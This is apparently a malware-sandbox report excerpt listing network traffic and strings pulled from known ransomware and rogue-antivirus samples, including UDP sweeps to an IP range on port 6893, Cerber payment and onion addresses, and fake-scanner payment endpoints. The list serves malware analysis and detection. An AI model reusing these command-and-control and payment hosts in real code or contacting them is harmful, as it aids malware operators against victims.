          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.59:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.60:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.61:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.62:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.63:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.64:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.65:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.66:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.67:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.68:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.69:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.70:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.71:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.72:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.73:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.74:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.75:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.76:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.77:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.78:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.79:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.80:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.81:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.82:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.83:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.84:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.85:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.86:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.87:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.88:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.89:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.90:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.91:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.92:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.93:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.94:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.95:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.96:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.97:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.98:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.99:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.100:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.101:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.102:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.103:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.104:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.105:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.106:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.107:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.108:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.109:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.110:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.111:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.112:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.113:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.114:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.115:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.116:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.117:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.118:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.119:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.120:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.121:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.122:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.123:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.124:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.125:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.126:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.127:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.128:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.129:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.130:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.131:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.132:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.133:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.134:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.135:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.136:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.137:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.138:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.139:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.140:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.141:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.142:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.143:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.144:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.145:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.146:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.147:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.148:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.149:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.150:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.151:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.152:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.153:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.154:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.155:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.156:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.157:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.158:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.159:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.160:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.161:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.162:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.163:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.164:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.165:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.166:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.167:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.168:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.169:6893
          Source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://antiviruspc-update.com:8080/
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.blo
          Source: Endermanch@DeriaLock.exe, 0000001B.00000000.424660470.0000000000A66000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/
          Source: Endermanch@DeriaLock.exe, 0000001B.00000000.424660470.0000000000A66000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe
          Source: Endermanch@DeriaLock.exe, 0000001B.00000000.424660470.0000000000A66000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://btc.blo
          Source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://bugs.clamav.net
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Endermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://checkeds.com/customers/installer.php?pid=AVT_BASIC
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
          Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: bpkAAJptGv.exe, 00000000.00000003.292934230.00000291DDCA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: rundll32.exe, 00000014.00000003.431911084.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, dispci.exe.20.drString found in binary or memory: http://diskcryptor.net/
          Source: Endermanch@AnViPC2009.exe, 0000000E.00000003.404319337.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, bzip2.dll.14.drString found in binary or memory: http://gnuwin32.sourceforge.net
          Source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://google.ru/
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000000.432949028.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000000.432949028.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.dr, Endermanch@Cerber5.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: Endermanch@SecurityDefener2015.exe.0.drString found in binary or memory: http://paypal.com/http://xhamster.com/http://visa.com/91.194.254.16download-defendersupport-defender
          Source: Endermanch@Krotten.exe.0.drString found in binary or memory: http://poetry.rotten.com/lightning/
          Source: pthreadVC2.dll.14.drString found in binary or memory: http://sources.redhat.com/pthreads-win32/b%
          Source: Endermanch@DeriaLock.exe, 0000001B.00000000.423229039.0000000000A22000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://wallup.net
          Source: Endermanch@DeriaLock.exe, 0000001B.00000000.423229039.0000000000A22000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://wallup.nethttp://wallup.nethttp://wallup.net
          Source: svchost.exe, 00000005.00000002.317915221.000001D18F413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
          Source: bzip2.dll.14.drString found in binary or memory: http://www.bzip.orgDVarFileInfo$
          Source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.clamav.net
          Source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.clamav.net/bugs
          Source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.clamav.net/support/faq
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: Endermanch@AnViPC2009.exe, 0000000E.00000003.404319337.00000000025CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/libtool/libtool.htmlDVarFileInfo$
          Source: Endermanch@HappyAntivirus.exe, 00000027.00000000.459071354.0000000000FD8000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://www.happyantivirus.co.cc/register.html
          Source: Endermanch@NavaShield.exe.0.drString found in binary or memory: http://www.navashield.com/
          Source: Endermanch@NavaShield.exe.0.drString found in binary or memory: http://www.navashield.com/83886080Nava
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/get_data.php?id=
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/new_install.php?owner=
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/paydefault.php;http//wwww.vikingwebscanner.com/scripts/defau
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/paymore.php
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/status.php?action=
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.vikingwebscanner.com/succes/.
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://www.vikingwebscanner.com/succes/index.php#pictureBox1.Image
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.17gcun.top/229D-A9FD-2C16-0098-B3AD
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.18ey8e.top/229D-A9FD-2C16-0098-B3AD
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.19kdeh.top/229D-A9FD-2C16-0098-B3AD
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1mpsnr.top/229D-A9FD-2C16-0098-B3AD
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1n5mod.top/229D-A9FD-2C16-0098-B3AD
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000003.317394365.000001D18F448000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318205613.000001D18F44E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000005.00000003.317571205.000001D18F441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318134090.000001D18F442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000005.00000003.317571205.000001D18F441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318134090.000001D18F442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000002.318621235.000001D18F465000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318134090.000001D18F442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.317915221.000001D18F413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000005.00000003.317545966.000001D18F456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000005.00000003.295478780.000001D18F432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000005.00000003.317394365.000001D18F448000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318205613.000001D18F44E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8
          Source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Endermanch@Cerber5.exe, 00000017.00000003.491861666.000000000540A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000017.00000003.430982779.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/downlo&#097;d/download-easy.html.en
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/results?search_query=Install
          Source: unknownDNS traffic detected: queries for: github.com
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E21CA3 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,20_2_04E21CA3
